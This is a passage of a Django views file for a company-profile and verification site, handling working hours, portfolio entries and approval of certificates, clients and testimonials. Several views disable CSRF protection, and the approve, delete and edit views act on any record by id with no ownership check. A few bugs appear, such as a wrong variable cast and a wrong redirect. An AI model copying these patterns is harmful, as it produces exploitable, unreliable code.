MonBrk2en = request.POST.get('monbreaktime2en')\n\n mondview.start_time = Monstart\n mondview.end_time = Monend\n mondview.breaktimef_start = MonBrk1st\n mondview.breaktimef_end = MonBrk1en\n mondview.breaktimes_start = MonBrk2st\n mondview.breaktimes_end = MonBrk2en\n mondview.day = 1\n mondview.save()\n\n except:\n \n\n Moncheck = request.POST.get('moncheck')\n Monstart = request.POST.get('monstartime')\n Monend = request.POST.get('monendtime')\n MonBrk1st = request.POST.get('monbreaktime1st')\n MonBrk1en = request.POST.get('monbreaktime1en')\n MonBrk2st = request.POST.get('monbreaktime2st')\n MonBrk2en = request.POST.get('monbreaktime2en')\n\n\n\n if request.method == \"POST\":\n if Moncheck:\n working = Working()\n working.start_time = Monstart\n working.end_time = Monend\n working.breaktimef_start = MonBrk1st\n working.breaktimef_end = MonBrk1en\n working.breaktimes_start = MonBrk2st\n working.breaktimes_end = MonBrk2en\n working.day = 1\n working.user_id = request.user.id\n working.save()\n \n\n\n try:\n\n tueview = Working.objects.get(user_id=request.user.id, day=2)\n \n\n if request.method == \"POST\":\n Tuecheck = request.POST.get('tuecheck')\n Tuestart = request.POST.get('tuestartime')\n Tueend = request.POST.get('tueendtime')\n TueBrk1st = request.POST.get('tuebreaktime1st')\n TueBrk1en = request.POST.get('tuebreaktime1en')\n TueBrk2st = request.POST.get('tuebreaktime2st')\n TueBrk2en = request.POST.get('tuebreaktime2en')\n\n tueview.start_time = Tuestart\n tueview.end_time = Tueend\n tueview.breaktimef_start = TueBrk1st\n tueview.breaktimef_end = TueBrk1en\n tueview.breaktimes_start = TueBrk2st\n tueview.breaktimes_end = 
TueBrk2en\n tueview.day = 2\n tueview.save()\n\n except:\n \n if request.method == \"POST\":\n Tuecheck = request.POST.get('tuecheck')\n Tuestart = request.POST.get('tuestartime')\n Tueend = request.POST.get('tueendtime')\n TueBrk1st = request.POST.get('tuebreaktime1st')\n TueBrk1en = request.POST.get('tuebreaktime1en')\n TueBrk2st = request.POST.get('tuebreaktime2st')\n TueBrk2en = request.POST.get('tuebreaktime2en')\n if Tuecheck:\n working = Working()\n working.start_time = Tuestart\n working.end_time = Tueend\n working.breaktimef_start = TueBrk1st\n working.breaktimef_end = TueBrk1en\n working.breaktimes_start = TueBrk2st\n working.breaktimes_end = TueBrk2en\n working.day = 2\n working.user_id = request.user.id\n working.save()\n \n\n\n \n\n try:\n wedview = Working.objects.get(user_id=request.user.id, day=3)\n \n\n if request.method == \"POST\":\n Wedcheck = request.POST.get('wedcheck')\n Wedstart = request.POST.get('wedstartime')\n Wedend = request.POST.get('wedendtime')\n WedBrk1st = request.POST.get('wedbreaktime1st')\n WedBrk1en = request.POST.get('wedbreaktime1en')\n WedBrk2st = request.POST.get('wedbreaktime2st')\n WedBrk2en = request.POST.get('wedbreaktime2en')\n\n wedview.start_time = Wedstart\n wedview.end_time = Wedend\n wedview.breaktimef_start = WedBrk1st\n wedview.breaktimef_end = WedBrk1en\n wedview.breaktimes_start = WedBrk2st\n wedview.breaktimes_end = WedBrk2en\n wedview.day = 3\n wedview.save()\n\n except:\n \n\n if request.method == \"POST\":\n Wedcheck = request.POST.get('wedcheck')\n Wedstart = request.POST.get('wedstartime')\n Wedend = request.POST.get('wedendtime')\n WedBrk1st = request.POST.get('wedbreaktime1st')\n WedBrk1en = request.POST.get('wedbreaktime1en')\n WedBrk2st = request.POST.get('wedbreaktime2st')\n WedBrk2en = request.POST.get('wedbreaktime2en')\n if Wedcheck:\n working = Working()\n working.start_time = Wedstart\n working.end_time = Wedend\n working.breaktimef_start = WedBrk1st\n working.breaktimef_end = WedBrk1en\n working.breaktimes_start = WedBrk2st\n working.breaktimes_end = WedBrk2en\n working.day = 3\n working.user_id = request.user.id\n working.save()\n \n\n try:\n thuview = Working.objects.get(user_id=request.user.id, day=4)\n \n\n if request.method == \"POST\":\n Thucheck = request.POST.get('thucheck')\n Thustart = request.POST.get('thustartime')\n Thuend = request.POST.get('thuendtime')\n ThuBrk1st = request.POST.get('thubreaktime1st')\n ThuBrk1en = request.POST.get('thubreaktime1en')\n ThuBrk2st = request.POST.get('thubreaktime2st')\n ThuBrk2en = request.POST.get('thubreaktime2en')\n\n thuview.start_time = Thustart\n thuview.end_time = Thuend\n thuview.breaktimef_start = ThuBrk1st\n thuview.breaktimef_end = ThuBrk1en\n thuview.breaktimes_start = ThuBrk2st\n thuview.breaktimes_end = ThuBrk2en\n thuview.day = 4\n thuview.save()\n\n except:\n \n\n if request.method == \"POST\":\n Thucheck = request.POST.get('thucheck')\n Thustart = request.POST.get('thustartime')\n Thuend = request.POST.get('thuendtime')\n ThuBrk1st = request.POST.get('thubreaktime1st')\n ThuBrk1en = request.POST.get('thubreaktime1en')\n ThuBrk2st = request.POST.get('thubreaktime2st')\n ThuBrk2en = request.POST.get('thubreaktime2en')\n if Thucheck:\n working = Working()\n working.start_time = Thustart\n working.end_time = Thuend\n working.breaktimef_start = ThuBrk1st\n working.breaktimef_end = ThuBrk1en\n working.breaktimes_start = ThuBrk2st\n working.breaktimes_end = ThuBrk2en\n working.day = 4\n working.user_id = request.user.id\n working.save()\n \n\n try:\n friview = 
Working.objects.get(user_id=request.user.id, day=5)\n \n\n if request.method == \"POST\":\n Fricheck = request.POST.get('fricheck')\n Fristart = request.POST.get('fristartime')\n Friend = request.POST.get('friendtime')\n FriBrk1st = request.POST.get('fribreaktime1st')\n FriBrk1en = request.POST.get('fribreaktime1en')\n FriBrk2st = request.POST.get('fribreaktime2st')\n FriBrk2en = request.POST.get('fribreaktime2en')\n\n friview.start_time = Fristart\n friview.end_time = Friend\n friview.breaktimef_start = FriBrk1st\n friview.breaktimef_end = FriBrk1en\n friview.breaktimes_start = FriBrk2st\n friview.breaktimes_end = FriBrk2en\n friview.day = 5\n friview.save()\n\n except:\n \n\n if request.method == \"POST\":\n Fricheck = request.POST.get('fricheck')\n Fristart = request.POST.get('fristartime')\n Friend = request.POST.get('friendtime')\n FriBrk1st = request.POST.get('fribreaktime1st')\n FriBrk1en = request.POST.get('fribreaktime1en')\n FriBrk2st = request.POST.get('fribreaktime2st')\n FriBrk2en = request.POST.get('fribreaktime2en')\n if Fricheck:\n working = Working()\n working.start_time = Fristart\n working.end_time = Friend\n working.breaktimef_start = FriBrk1st\n working.breaktimef_end = FriBrk1en\n working.breaktimes_start = FriBrk2st\n working.breaktimes_end = FriBrk2en\n working.day = 5\n working.user_id = request.user.id\n working.save()\n \n\n try:\n satview = Working.objects.get(user_id=request.user.id, day=6)\n \n\n if request.method == \"POST\":\n Satcheck = request.POST.get('satcheck')\n Satstart = request.POST.get('satstartime')\n Satend = request.POST.get('satendtime')\n SatBrk1st = request.POST.get('satbreaktime1st')\n SatBrk1en = request.POST.get('satbreaktime1en')\n SatBrk2st = request.POST.get('satbreaktime2st')\n SatBrk2en = request.POST.get('satbreaktime2en')\n\n satview.start_time =Satstart\n satview.end_time = Satend\n satview.breaktimef_start = SatBrk1st\n satview.breaktimef_end = SatBrk1en\n satview.breaktimes_start = SatBrk2st\n satview.breaktimes_end = SatBrk2en\n satview.day = 6\n satview.save()\n\n except:\n \n\n if request.method == \"POST\":\n Satcheck = request.POST.get('satcheck')\n\n\n Satstart = request.POST.get('satstartime')\n Satend = request.POST.get('satendtime')\n SatBrk1st = request.POST.get('satbreaktime1st')\n SatBrk1en = request.POST.get('satbreaktime1en')\n SatBrk2st = request.POST.get('satbreaktime2st')\n SatBrk2en = request.POST.get('satbreaktime2en')\n if Satcheck:\n working = Working()\n working.start_time = Satstart\n working.end_time = Satend\n working.breaktimef_start = SatBrk1st\n working.breaktimef_end = SatBrk1en\n working.breaktimes_start = SatBrk2st\n working.breaktimes_end = SatBrk2en\n working.day = 6\n working.user_id = request.user.id\n working.save()\n \n\n try:\n sunview = Working.objects.get(user_id=request.user.id, day=7)\n \n\n if request.method == \"POST\":\n Suncheck = request.POST.get('suncheck')\n Sunstart = request.POST.get('sunstartime')\n Sunend = request.POST.get('sunendtime')\n SunBrk1st = request.POST.get('sunbreaktime1st')\n SunBrk1en = request.POST.get('sunbreaktime1en')\n SunBrk2st = request.POST.get('sunbreaktime2st')\n SunBrk2en = request.POST.get('sunbreaktime2en')\n\n sunview.start_time =Sunstart\n sunview.end_time = Sunend\n sunview.breaktimef_start = SunBrk1st\n sunview.breaktimef_end = SunBrk1en\n sunview.breaktimes_start = SunBrk2st\n sunview.breaktimes_end = SunBrk2en\n sunview.day = 7\n sunview.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n except:\n\n \n\n if request.method 
== \"POST\":\n Suncheck = request.POST.get('suncheck')\n Sunstart = request.POST.get('sunstartime')\n Sunend = request.POST.get('sunendtime')\n SunBrk1st = request.POST.get('sunbreaktime1st')\n SunBrk1en = request.POST.get('sunbreaktime1en')\n SunBrk2st = request.POST.get('sunbreaktime2st')\n SunBrk2en = request.POST.get('sunbreaktime2en')\n if Suncheck:\n working = Working()\n working.start_time = Sunstart\n working.end_time = Sunend\n working.breaktimef_start = SunBrk1st\n working.breaktimef_end = SunBrk1en\n working.breaktimes_start = SunBrk2st\n working.breaktimes_end = SunBrk2en\n working.day = 7\n working.user_id = request.user.id\n working.save()\n \n\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef transalator(request):\n if request.method == \"POST\":\n text = request.POST.get('texts')\n \n \n \n \n \n \n phone_number1 = phonenumbers.parse(text)\n \n \n \n phone_number2 = phonenumbers.parse(text)\n \n\n\n return render(request,'transalator.html')\n\n@login_required(login_url = 'login')\ndef aboutus(request):\n form = AboutForm\n if request.method== \"POST\":\n form = AboutForm(request.POST)\n about = form.save(commit = False)\n about.user_id = request.user.id\n about.save()\n return render(request, 'profile/profile-company-edit.html')\n\n@login_required(login_url = 'login')\ndef achievements(request):\n AchievementFormSet = modelformset_factory(Achievement, fields=('name',), extra=3)\n\n if request.method == \"POST\":\n formset = AchievementFormSet(request.POST)\n instances = formset.save(commit=False)\n\n for instance in instances:\n instance.user_id = request.user.id\n instance.save()\n\n formset = AchievementFormSet(queryset = Achievement.objects.filter(user_id = request.user.id))\n\n context = {'formset': formset}\n\n return render(request, 'profile/profile-company-edit.html',context)\n\n@login_required(login_url = 'login')\ndef addlocation(request):\n try:\n \n location = Location.objects.get(user_id = request.user.id )\n \n if request.method == \"POST\":\n locat= request.POST.get('location') \n \n location.place = locat\n location.user_id = request.user.id\n location.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n except:\n \n if request.method == \"POST\":\n \n location = request.POST.get('location') \n loc = Location()\n loc.place = location\n loc.user_id = request.user.id\n loc.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n \n \n\n@login_required(login_url = 'login')\ndef projects(request):\n form = ProjectsForm()\n if request.method == \"POST\":\n form = ProjectsForm(request.POST)\n productname = request.POST.get('project_name')\n company = request.POST.get('company_name')\n authority = request.POST.get('company_name_id')\n if authority:\n auth = int(authority)\n \n projects = Projects()\n projects.user_id = request.user.id\n projects.authname = company \n projects.project_name = productname\n if authority:\n projects.auth_id = auth \n \n projects.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editprojects(request,id):\n pro = Projects.objects.get(id = id)\n if request.method == \"POST\":\n Proj = request.POST.get('project_name')\n Comp = request.POST.get('company_name_edit')\n authority = request.POST.get('company_name_edit_id')\n if authority:\n autho = int(authority)\n pro.authname = Comp\n \n pro.project_name = Proj\n if authority:\n pro.auth_id = autho\n pro.save()\n\n return 
HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef cexpertise(request):\n    CexpertiseFormset = modelformset_factory(Cexepertise, fields = ('profession', 'year'), extra = 3)\n    if request.method == \"POST\":\n        cexpertiseForm = CexpertiseFormset(request.POST)\n        # was: instances = cexpertiseForm(commit = False) -- a formset is not\n        # callable; save(commit=False) returns the unsaved instances\n        if cexpertiseForm.is_valid():\n            instances = cexpertiseForm.save(commit=False)\n            for instance in instances:\n                instance.user_id = request.user.id\n                instance.save()\n    cexpertiseForm = CexpertiseFormset(queryset = Cexepertise.objects.filter(user_id = request.user.id))\n    context = {\n        'cexpertiseForm': cexpertiseForm\n    }\n    return render(request, 'profile/profile-company-edit.html', context)\n\n\n@csrf_exempt\n@login_required(login_url = 'login')\ndef addabout(request):\n    try:\n        view = About.objects.get(user_id = request.user.id)\n        form = AboutForm(instance = view)\n        if request.method == \"POST\":\n            form = AboutForm(request.POST, instance = view)\n            if form.is_valid():\n                z = form.save()\n                ser_instance = serializers.serialize('json', [z, ])\n                return JsonResponse({\"instance\": ser_instance}, status=200)\n            else:\n                return JsonResponse({\"error\": form.errors}, status=400)\n\n    except About.DoesNotExist:\n        form = AboutForm()\n        if request.method == \"POST\":\n            form = AboutForm(request.POST)\n            if form.is_valid():\n                about = form.save(commit=False)\n                about.user_id = request.user.id\n                about.save()\n                return HttpResponse('added')\n            else:\n                return HttpResponse('invalid')\n\n    return JsonResponse({\"error\": \"\"}, status=400)\n\n\n@login_required(login_url = 'login')\ndef expertise(request):\n    form = ExpertiseForm()\n    if request.method == \"POST\":\n        exp = request.POST.get('expertise')\n        expid = request.POST.get('expertise_id')\n        form = ExpertiseForm(request.POST)\n        if form.is_valid():\n            experti = form.save(commit = False)\n            experti.user_id = request.user.id\n            experti.authname = exp\n            if expid:\n                experti.auth_id = expid\n            experti.save()\n    return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef editexpertise(request, id):\n    exp = Expertise.objects.get(id = id)\n    expedit = request.POST.get('expertise_edit')\n    expid = request.POST.get('expertise_edit_id')\n    if request.method == \"POST\":\n        exp.profession = request.POST.get('profession')\n        exp.expertisein = request.POST.get('expertisein')\n        exp.years = request.POST.get('years')\n        exp.description = request.POST.get('description')\n        if expid:\n            exp.auth_id = expid\n        exp.authname = expedit\n        exp.save()\n\n    return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@csrf_exempt\n@login_required(login_url = 'login')\ndef addachievements(request):\n    form = AchievementsForm()\n    if request.method == \"POST\":\n        form = AchievementsForm(request.POST)\n        ach = request.POST.get('achievementss')\n        achid = request.POST.get('achievementss_id')\n        if form.is_valid():\n            achievement = form.save(commit = False)\n            achievement.user_id = request.user.id\n            achievement.authname = ach\n            if achid:\n                achievement.auth_id = int(achid)\n            achievement.save()\n    return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editachievements(request, id):\n    ach = Achievements.objects.get(id= id)\n    if request.method == \"POST\":\n        tit = request.POST.get('achievementtitle')\n        ache = request.POST.get('achievementss_edit')\n        achid = request.POST.get('achievementss_edit_id')\n        des = 
request.POST.get('description')\n \n if achid:\n achi = int(achid)\n ach.auth_id = achi\n ach.authname = ache\n ach.description= des\n ach.title = tit\n ach.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@csrf_exempt\n@login_required(login_url = 'login')\ndef experience(request):\n form = ExperienceForm()\n if request.method == \"POST\":\n companyid = request.POST.get('company-name_id')\n companyname = request.POST.get('company-name')\n \n company = request.POST.get('company')\n if companyid:\n cid = int(companyid)\n form = ExperienceForm(request.POST,request.FILES)\n if form.is_valid():\n exp = form.save(commit = False)\n exp.user_id = request.user.id\n exp.company_name = companyname\n if companyid:\n exp.company_id = cid\n exp.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editexperience(request,id):\n exp = Experience.objects.get(id = id)\n if request.method == \"POST\":\n fromyear = request.POST.get('fromyear')\n toyear = request.POST.get('toyear')\n companyname = request.POST.get('company-name_edit')\n \n company_id = request.POST.get('client-name_edit_id')\n if company_id:\n cid = int(companyname)\n exp_keywords = request.POST.get('exp_keywords')\n expdetail = request.POST.get('exp_detail')\n comments = request.POST.get('comments')\n responsibility = request.POST.get('responsibility')\n expimage = request.POST.get('expimage')\n\n exp.fromyear = fromyear\n if company_id:\n exp.company_id = cid\n exp.company_name = companyname\n exp.toyear = toyear\n exp.exp_keywords = exp_keywords\n exp.exp_detail = expdetail\n exp.comments = comments\n exp.responsibily = responsibility\n exp.expimage = expimage\n exp.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef addclient(request):\n form = ClientForm()\n if request.method == \"POST\":\n ClientName = request.POST.get('client-name')\n Client = request.POST.get('client-name_id')\n Img = request.FILES.get('clientImage')\n if Client:\n c= int(Client)\n form = ClientForm(request.POST,request.FILES)\n if form.is_valid():\n client = form.save(commit = False)\n client.user_id = request.user.id\n client.clientname = ClientName\n if Img:\n client.clientimage = Img\n if Client:\n client.client_id = c\n client.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editclient(request,id):\n cli = Client.objects.get(id = id)\n if request.method == \"POST\":\n ClientName = request.POST.get('client-name_edit')\n Cliid = request.POST.get('client-name_edit_id')\n Cliimage = request.FILES.get('clientimage')\n Clidesc = request.POST.get('client_description')\n\n\n \n if Cliid:\n cid = int(Cliid)\n cli.client_id = cid\n if Cliimage:\n cli.clientimage = Cliimage\n else:\n pass\n cli.client_description = Clidesc\n cli.clientname = ClientName\n cli.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n\n@login_required(login_url = 'login')\ndef addtestimonial(request):\n form = TestimonialForm()\n if request.method == \"POST\":\n Test = request.POST.get('testicliName')\n Testid = request.POST.get('testicliName-id')\n \n \n form = TestimonialForm(request.POST,request.FILES)\n if form.is_valid():\n testimonial = form.save(commit = False)\n \n testimonial.user_id = request.user.id\n testimonial.testimonial_name = Test\n if Testid:\n d =int(Testid)\n \n testimonial.testuser_id = d\n testimonial.save()\n return 
HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef edittestimonial(request,id):\n test = Testimonial.objects.get(id = id)\n if request.method == \"POST\":\n Test = request.POST.get('testicliNameEdit')\n Testid = request.POST.get('testicliName-idEdit{{i.id}}')\n TestImg = request.FILES.get('testimonial_image')\n Testdesc = request.POST.get('testimonial_description')\n\n \n \n test.testimonial_name = Test\n\n if TestImg:\n test.testimonial_image = TestImg\n else:\n pass\n \n if Testid:\n Clname = int(Testid)\n test.testuser_id = Clname\n test.testimonial_description = Testdesc\n test.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef addcertificate(request):\n form = CertificateForm()\n if request.method == \"POST\":\n AuthorityName = request.POST.get('issued_authority')\n Authority = request.POST.get('issued_authority_id')\n \n \n if Authority:\n a = int(Authority)\n\n \n form = CertificateForm(request.POST,request.FILES)\n if form.is_valid():\n certificate = form.save(commit = False)\n certificate.user_id = request.user.id\n if Authority:\n certificate.authority_id = a\n certificate.company_name = AuthorityName\n certificate.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef editcertificate(request,id):\n \n cer = Certificate.objects.get(id = id)\n if request.method == \"POST\":\n isauth = request.POST.get('issued_authority_edit_id')\n authname = request.POST.get('issued_authority_edit')\n Cername = request.POST.get('certificate_name')\n CerId = request.POST.get('certificate_id')\n CerIma = request.FILES.get('certificate_image')\n CerDes = request.POST.get('certificate_description')\n \n\n\n \n if isauth :\n IA = int(isauth)\n \n if isauth :\n cer.authority_id = IA\n cer.certificate_name = Cername\n \n cer.certificate_id = CerId\n cer.company_name = authname\n\n if CerIma:\n cer.certificate_image = CerIma\n else:\n pass\n cer.certificate_description = CerDes\n\n\n\n cer.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef addbranch(request):\n form = BranchForm()\n if request.method == \"POST\":\n form = BranchForm(request.POST,request.FILES)\n if form.is_valid():\n certificate = form.save(commit = False)\n certificate.user_id = request.user.id\n certificate.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url = 'login')\ndef editbranch(request,id):\n\n branch = Branch.objects.get(id = id)\n if request.method == \"POST\":\n branchP = request.POST.get('branch')\n branchAddres = request.POST.get('branchaddress')\n\n branch.branch= branchP\n branch.branchaddress = branchAddres\n branch.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n\n\n######################################CERTIFICATE verification ##################################\n@login_required(login_url = 'login')\ndef verifycertificate(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n \n pending = Certificate.objects.filter(authority_id = request.user.id ,is_requested = 1,is_approved = 0,is_rejected = 0)\n approved = Certificate.objects.filter(authority_id = request.user.id,is_requested = 1,is_approved = 1,is_rejected = 0)\n companies = CustomUser.objects.all()\n \n context = {\n 'pending':pending,\n 'approved':approved,\n 'companies':companies,\n 'company':company,\n }\n return 
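# [Editor's note] The edit views above (editclient, edittestimonial,
# editcertificate, ...) all guard uploads with "if <file>: obj.field = <file>
# / else: pass" so an empty upload keeps the old file. A tiny helper makes the
# intent explicit (the helper name is illustrative, not from the source):
#
#     def set_if_present(obj, field, value):
#         # Overwrite obj.<field> only when the form actually sent a value.
#         if value:
#             setattr(obj, field, value)
#
#     set_if_present(cli, 'clientimage', request.FILES.get('clientimage'))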
render(request,'verification/verification-certificate.html',context)\n\n@login_required(login_url = 'login')\ndef approvecertificate(request,id):\n \n approve = Certificate.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n\n Cer = approve.authority_id\n\n notify = Notification()\n notify.user_id = request.user.id\n notify.sender_id = Cer\n notify.notification_type = 3\n notify.save()\n return redirect('verifycertificate')\n\n@login_required(login_url = 'login')\ndef deletecertificate(request,id):\n dele = Certificate.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n \n return redirect('verifycertificate')\n\n@login_required(login_url = 'login')\ndef editverificationcertificate(request,id):\n cer = Certificate.objects.get(id = id)\n if request.method == \"POST\":\n Cername = request.POST.get('certificate_name')\n CerId = request.POST.get('certificate_id')\n CerIma = request.FILES.get('certificate_image')\n CerDes = request.POST.get('certificate_description')\n\n \n cer.certificate_name = Cername\n cer.certificate_id = CerId\n if CerIma:\n cer.certificate_image = CerIma\n else:\n pass\n\n cer.certificate_description = CerDes\n cer.save()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendvercertificate(request,id):\n\n sendreq = Certificate.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n\n\n\n\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n\n\n###################CLIENT verification ######################################\n@login_required(login_url = 'login')\ndef verifyclient(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Client.objects.filter(client_id = request.user.id ,is_requested = 1,is_approved = 0,is_rejected = 0)\n approved = Client.objects.filter(client_id = request.user.id ,is_requested = 1,is_approved = 1,is_rejected = 0)\n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company\n }\n return render(request, 'verification/verification-client.html',context)\n\n\n@login_required(login_url = 'login')\ndef approveclient(request,id):\n approve = Client.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyclient')\n\n@login_required(login_url = 'login')\ndef deleteclient(request,id):\n dele = Client.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifyclient')\n\n@login_required(login_url = 'login')\ndef editverificationclient(request,id):\n cli = Client.objects.get(id = id)\n\n if request.method == \"POST\":\n\n # Cliid = request.POST.get('client-name')\n Cliimage = request.FILES.get('clientimage')\n Clidesc = request.POST.get('client_description')\n\n \n cli.client_description = Clidesc\n if Cliimage:\n\n\n\n cli.clientimage = Cliimage\n else:\n pass\n cli.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverclient(request,id):\n sendreq = Client.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n#####################TESTIMONIAL Verification ######################################\n\n@login_required(login_url = 'login')\ndef verifytestimonial(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Testimonial.objects.filter(testuser_id=request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = 
Testimonial.objects.filter(testuser_id=request.user.id,is_requested = 1, is_approved=1,is_rejected = 0)\n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 'verification/verification-testimonial.html',context)\n\n\n@login_required(login_url = 'login')\ndef approvetestimonial(request,id):\n approve = Testimonial.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifytestimonial')\n\n@login_required(login_url = 'login')\ndef deletetestimonial(request,id):\n dele = Testimonial.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifytestimonial')\n\n@login_required(login_url = 'login')\ndef editverificationtestimonial(request,id):\n testi = Testimonial.objects.get(id = id)\n\n if request.method == \"POST\":\n TestImg = request.FILES.get('testimonial_image')\n Testdesc = request.POST.get('testimonial_description')\n\n testi.testimonial_description = Testdesc\n\n \n\n if TestImg:\n testi.testimonial_image = TestImg\n else:\n pass\n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendvertestimonial(request,id):\n \n sendreq = Testimonial.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n###########################verify achievement######################\n\n@login_required(login_url = 'login')\ndef verifyachievements(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Achievements.objects.filter(auth_id= request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = Achievements.objects.filter(auth_id= request.user.id,is_requested = 1, is_approved=1,is_rejected = 0)\n \n \n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 'verification/verification-achievements.html',context)\n\n@login_required(login_url = 'login')\ndef approveachievements(request,id):\n approve = Achievements.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyachievements')\n\n@login_required(login_url = 'login')\ndef deleteachievements(request,id):\n dele = Achievements.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifytestimonial')\n\n@login_required(login_url = 'login')\ndef editverificationachievements(request,id):\n testi = Achievements.objects.get(id = id)\n\n if request.method == \"POST\":\n # TestImg = request.FILES.get('testimonial_image')\n Achtitle = request.POST.get('achtitle')\n AchDesc = request.POST.get('achdesc')\n\n testi.title = Achtitle\n testi.description = AchDesc\n\n \n\n # if TestImg:\n # testi.testimonial_image = TestImg\n # else:\n # pass\n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverachievements(request,id):\n \n sendreq = Achievements.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n#########################verify expertise###########################\n\n@login_required(login_url = 'login')\ndef verifyexpertise(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Expertise.objects.filter(auth_id=request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = Expertise.objects.filter(auth_id=request.user.id,is_requested = 1, 
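# [Editor's note] The certificate/client/testimonial/achievements/expertise/
# projects/experience verification views above differ only in model, owner
# field and template. A closure-based sketch of the shared shape (names are
# illustrative, not from the source):
#
#     def make_verify_view(model, owner_field, template):
#         @login_required(login_url='login')
#         def view(request):
#             base = model.objects.filter(**{owner_field: request.user.id},
#                                         is_requested=1, is_rejected=0)
#             context = {
#                 'pending': base.filter(is_approved=0),
#                 'approved': base.filter(is_approved=1),
#                 'company': request.user.groups.filter(name='COMPANY').exists(),
#             }
#             return render(request, template, context)
#         return view
#
#     verifyclient = make_verify_view(Client, 'client_id',
#                                     'verification/verification-client.html')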
is_approved=1,is_rejected = 0)\n \n\n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 'verification/verification-expertise.html',context)\n\n@login_required(login_url = 'login')\ndef approveexpertise(request,id):\n approve = Expertise.objects.get(id = id)\n approve.is_approved = 1\n approve.save()\n return redirect('verifyexpertise')\n\n@login_required(login_url = 'login')\ndef deleteexpertise(request,id):\n dele = Expertise.objects.get(id = id)\n dele.is_rejected = 1\n dele.save()\n return redirect('verifyexpertise')\n\n@login_required(login_url = 'login')\ndef editverificationexpertise(request,id):\n testi = Expertise.objects.get(id = id)\n\n if request.method == \"POST\":\n exprofession = request.POST.get('exprofession')\n expexpertisein = request.POST.get('expexpertisein')\n expyears = request.POST.get('expyears')\n expdescription = request.POST.get('expdescription')\n \n \n testi.profession = exprofession\n testi.expertisein = expexpertisein\n testi.years = expyears\n testi.description = expdescription\n \n testi.save()\n\n\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url = 'login')\ndef sendverexpertise(request,id):\n \n sendreq = Expertise.objects.get(id = id)\n sendreq.is_requested = 1\n sendreq.save()\n \n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n#########################verify projects##########################\n\n@login_required(login_url = 'login')\ndef verifyprojects(request):\n company = request.user.groups.filter(name='COMPANY').exists()\n pending = Projects.objects.filter(auth_id=request.user.id,is_requested = 1, is_approved=0,is_rejected = 0)\n approved = Projects.objects.filter(auth_id=request.user.id,is_requested = 1, is_approved=1,is_rejected = 0)\n \n context = {\n 'pending': pending,\n 'approved': approved,\n 'company':company,\n }\n return render(request, 'verification/verification-projectsproducts.html',context)\n\n@login_required(login_url = 'login')\ndef approveprojects(request,id):\n approve = Projects.objects.get(id = 